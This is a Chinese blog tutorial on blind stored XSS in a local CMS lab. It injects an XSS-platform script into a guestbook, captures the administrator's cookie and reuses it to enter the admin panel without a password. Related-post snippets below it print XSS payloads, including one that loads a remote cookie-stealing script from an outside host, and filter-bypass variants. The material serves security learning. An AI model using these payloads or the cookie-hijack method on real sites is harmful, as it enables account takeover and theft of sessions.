XSS盲打实战与Cookie欺骗

已于 2023-08-27 23:03:34 修改
阅读量1.9k 收藏 5
点赞数 2
分类专栏: web渗透实战 文章标签: xss XSS盲打 web渗透 XSS攻击 XSS之cookie欺骗
于 2023-08-27 22:59:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46367450/article/details/132529247
版权

文章目录

XSS盲打

本教程实战简单的xss注入,并利用存储型xss注入,获取cms靶场的后台管理员的cookie,从而实现免密登录。

案例环境

php环境:phpstudy20261103.exe

靶场:cms

领取地址:链接:https://pan.baidu.com/s/1OeEMML4GRCsbC4LpQK9KoA?pwd=jap0
提取码:jap0

任务

1.挖掘cms 网站XSS 漏洞

进入cms的首页,很容易发现这个地方有xss漏洞

image-20230825190037517

可以进行xss攻击让他弹窗,但是这个仅仅是反射型,影响不大

image-20230825190007955

于是我们可以继续寻找,看看有没有存储型的xss

经过查找,发现留言板功能可能有存储型的xss漏洞

image-20230825190938520

2.利用XSS 平台盲打网站后台管理员Cookie

利用xsspt平台的xss注入,获取管理员cookie:https://xss.pt/

在这个平台创建项目之后,使用其中的js代码进行xss攻击:

image-20230825191226305

3.将xss平台的js代码输入留言板

提交之后,提示等待管理员审核,所以接下来就模拟管理员查看留言板。

4.模拟管理员查看留言板

image-20230825191415348

管理员查看留言板之后,我们可以在xsspt平台看到我们获取的cookie信息:

image-20230825191601805

5.Cookie 欺骗

获取了cookie信息,我们就可以利用cookie,不用密码登录后台,在一个没有该cms后台管理的cookie的浏览器中设置cookie:

image-20230825203229048

设置好之后,直接访问admin的首页http://localhost/cms/admin/index.php,可以直接到达后台,从而达到了cookie欺骗的目的。

【网络安全】实操XSS订单系统漏洞(利用盲打
你在看屏幕的同时,屏幕也在注视着你
09-07 4264
xss订单靶场实战
XSS漏洞学习笔记
qi_SJQ_的博客
12-31 2773
xss学习笔记
第23篇:XSS绕过防护盲打某SRC官网后台
ABC_123的博客
09-19 1893
Part1 前言已经N年没挖SRC了,前几年曾有一段时间对XSS漏洞挖掘特别热衷,像反射型XSS、存储型XSS、DOM型XSS等挖得很上瘾,记下了很多笔记。遗憾的是多数平台都不愿意接收XSS漏洞,哪怕是存储型XSS漏洞给的评分都很低,因为XSS不能造成直接危害,利用起来有困难。所以当时花费了2天的时间,绕过各种防护及过滤,盲打到了一个SRC电商官网的后台。正好公众号文章写到现在,也缺少一篇讲解...
bxss:一款强大的盲XSS漏洞扫描工具
最新发布
gitblog_00260的博客
03-28 649
bxss:一款强大的盲XSS漏洞扫描工具 bxss Blind XSS Scanner is a tool that can be used to scan for blind XSS vulnerabilities in web applications. ...
XSS-窃取Cookie pikachu靶场
starhei.zxy的博客
07-23 515
1.在https://xssaq.com/ ⽹站注册账号并登陆,点击"创建项⽬"并填写项⽬名称...⽴即提交。4.打开⼀个pikachu靶场 在 xss盲打里面将我们刚才复制的script恶意代码输⼊进去。5.pikachu管理员登录后台的操作 登录完成后触发我们插⼊的恶意代码。2.在我的项⽬中选择我们刚创建的项⽬ 点击右上⻆的查看配置代码。6.这个时候平台上可看到其劫持的Cookie信息。3.复制script这⼀条代码。
服务器搭建XSS盲打平台,绕坑
CC__Faker的博客
05-07 1660
文章目录环境介绍环境搭建平台搭建平台使用 环境介绍 本次搭建环境采用的是ubuntu20,php,apache2,无需数据库 XSS平台项目名称:BlueLotus_XSSReceiver 项目地址:https://github.com/trysec/BlueLotus_XSSReceiver 环境搭建 sudo apt update 更新源 sudo apt install apache2 安装apache sudo systemctl status apache2 查看apac
什么是xss盲打
aletero的专栏
07-11 4133
什么是xss盲打?         盲打只是一种惯称的说法,就是不知道后台不知道有没有xss存在的情况下,不顾一切的输入xss代码在留言啊,feedback啊之类的地方,尽可能多的尝试xss的语句语句的存在方式,就叫盲打。        “xss盲打”是指在攻击者对数据提交后展现的后台未知的情况下,网站采用了攻击者插入了带真实攻击功能的xss攻击代码(通常是使用script标签引入远程的js
XSS盲打
Naive_boy00的博客
10-15 2685
XSS的查找:绕过过滤机制,利用服务端错误的编码方式例:url:http//www.foo.com/xss.php?id=1HTML标签之间<div>[输出]</div> //xsspayload:<script>alert(1)</script>标签之间无法执行脚本,要先闭合掉对应的标签。此类标签有:<title></title> <textarea></textarea> <xmp></xmp>
xss 盲打使用
weixin_68177269的博客
02-01 1263
将生成的js脚本写到网站的留言框处,但对应的用户(尤其是admin)查看留言,就会触发脚本。在用户的电脑浏览器没有勾选httponly的选项,就可以直接获取用户的cookie。使用beef等内网xss平台,或外网xss平台(就可以直接绕过登录,使用该用户权限登录网站。将获得的cookie,填写的对应的位置,
关于xss盲打关于xss盲打
u012614598的专栏
11-21 1088
关于xss盲打关于xss盲打      又到了各种年终总结的时候了,先祝各位看官“圣诞快乐”。我记得有朋友问我在2012年里有没有“猥琐流”比较出彩的东西时,我给的答案是“xss盲打”!   关于“盲打”这个词语的出现,最早应该是在wooyun里id为“胯下有杀气”的马甲提出的。最早的一个wooyun案列是2012年7月提交的《WooYun-2012-09547》 ,由此xss盲打火了起来,
XSS(跨站脚本攻击)漏洞解析(带靶场演示)
wudideaqing的博客
06-24 2447
XSS(跨站脚本攻击,全称Cross-Site Scripting)是一种常见网络安全漏洞,允许攻击者在用户浏览器中执行恶意脚本。攻击者通过在受信任网站中注入恶意代码,诱骗用户点击或加载恶意内容,从而窃取数据、篡改页面或劫持用户。
【干货】XSS知识总结
hackzkaq的博客
10-27 6823
XSS基础 跨站脚本(英语:Cross-site scripting,通常简称为:XSS)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至
逻辑漏洞挖掘之XSS漏洞原理分析及实战演练
yj520400的博客
03-22 1355
2月份的1.2亿条用户地址信息泄露再次给各大公司敲响了警钟,数据安全的重要性愈加凸显,这也更加坚定了我们推行安全测试常态化的决心。随着测试组安全测试常态化的推进,有更多的同事对逻辑漏洞产生了兴趣,本系列文章旨在揭秘逻辑漏洞的范围、原理及预防措施,逐步提升大家的安全意识。作为开篇第一章,本文选取了广为熟知的XSS逻辑漏洞进行介绍。1.XSS漏洞的定义跨站脚本(Cross Site Script),为了不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本缩写为XSS
04 渗透测试基础
热门推荐
weixin_43234021的博客
01-04 1万+
渗透测试基础一 代码审计1 基础环境搭建(1) Web服务:WAMP+phpstudy(2) phpstudy2 HTML 表单 一 代码审计 1 基础环境搭建 (1) Web服务:WAMP+phpstudy (2) phpstudy 启动问题 端口正常开放 80 http 3306 mysql web根目录[C:\Users\dq\Documents\phpStudy-1-24\phpStudy\WWW] php 探针 phpinfo.php phpmyadmin Apache配置文件:[
Pikachu靶场之(XSS盲打)
qq_45754781的博客
06-07 2672
XSS入门之PikachuXSS盲打
Pikachu靶场:XSS盲打
witwitwiter的博客
04-17 2300
Pikachu靶场:XSS盲打 实验环境以及工具 Firefox浏览器、Burp Suite、Pikachu靶场 实验原理 ●xss盲打也是属于存储型XSS类型 盲打的意思是无法直接在前端看到反馈效果。 xss盲打类型交互的数据会被存在在数据库里面,永久性存储,一般出现在留言板,问卷调查等页面。 形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格,导致“精心构造”的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害。存储型XSS漏洞跟反射型形成的原因一样,不同的是存储型XSS攻击者可以
XSS跨站脚本攻击之——XSS盲打
温柔小薛的博客
04-05 818
XSS盲打 XSS盲打就是攻击者在前端提交的数据不知道后台是否存在xss漏洞的情况下, 提交恶意JS代码在类似留言板等输入框后,所展现的后台位置的情况下, 网站采用了攻击者插入的恶意代码, 当后台管理员在操作时就会触发插入的恶意代码, 从而达到攻击者的目的。 方法 ‘’‘><script>alert('123')</script>+攻击代码 在文本框提交 ...
某次日常xss盲打
召唤大白的博客
03-09 360
今天接到个渗透测试的活,基本上就是静态站,本来也不报啥希望了,扫了一圈整个站就一个留言功能,根据经验一般留言就是在标签里,所以右键查看下元素,确定留言内容确实在里面,随手一个xss盲打未拦截,成功提交留言。 盲打使用的xss平台的默认模块Payload: ccc”</tExtArEa><sCRiPt sRC=https://xss8.cc/CnQ6></sCrIpT><textarea> 快下班时意外收到了弹回来的cookie,并且定位到了该站后台地址如下图,
XSS漏洞:原理、检测防护
TechEnthusiast的博客
08-09 307
XSS(Blind Cross-Site Scripting)是一种特殊的XSS(跨站脚本)攻击传统的XSS不同,盲XSS的payload不会在攻击者的浏览器中立即执行,而是被存储在服务器上,并在稍后由其他用户(通常是管理员)访问时触发。这种特性使得盲XSS更难被检测和防御,但其潜在危害可能更大。盲XSS是一种隐蔽但潜在危害巨大的安全漏洞。通过深入理解其原理、常见位置,并采取适当的检测和防护措施,我们可以有效降低盲XSS带来的风险。
pikachu靶场xss盲打
12-27
### Pikachu靶场 XSS盲打实验指导 #### 实验环境搭建 为了进行XSS盲打测试,需先设置好Pikachu靶场的运行环境。通常情况下,该靶场部署于本地服务器上,访问路径应为`localhost:8086/pikachu-master/vul/xss/xssblind/admin_login.php`[^2]。 #### 测试原理说明 XSS(跨站脚本攻击)发生的原因在于应用程序未能充分验证或转义用户输入的数据就将其作为HTML内容返回给客户端浏览器渲染。对于盲打类型的XSS而言,由于无法即时看到反馈效果,因此需要通过其他方式确认是否存在漏洞以及成功的可能性。这类攻击的特点是在没有直接可见响应的情况下完成恶意代码植入并触发执行[^3]。 #### 操作实例展示 假设存在一个登录页面允许管理员账号密码录入,在此场景下尝试构造如下形式的payload来检测潜在的安全隐患: ```html "><script>alert('XSS')</script> ``` 上述Payload旨在闭合原有标签属性,并插入一段JavaScript代码用于弹窗提示“XSS”,以此证明当前环境中可能存在未加防护措施而暴露出来的DOM节点可被篡改的风险点[^1]。 当遇到某些防御机制时,则可能需要用到变形后的版本以规避简单的过滤规则,比如将大小写混合或者增加不必要的空白字符等方法实现绕过目的。例如下面这个例子展示了如何调整原始语句结构达到相同的效果: ```html <ScRiPt >alert('xss');</sCrIpT > ``` 一旦成功提交含有此类特殊字符串格式的信息至目标位置后,即使界面本身没有任何变化指示,也意味着已经完成了所谓的“盲打”。此时可以通过监听网络请求、查看源码等方式进一步判断是否真正实现了预期中的行为改变——即嵌入式的JS被执行了[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yuan_boss

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值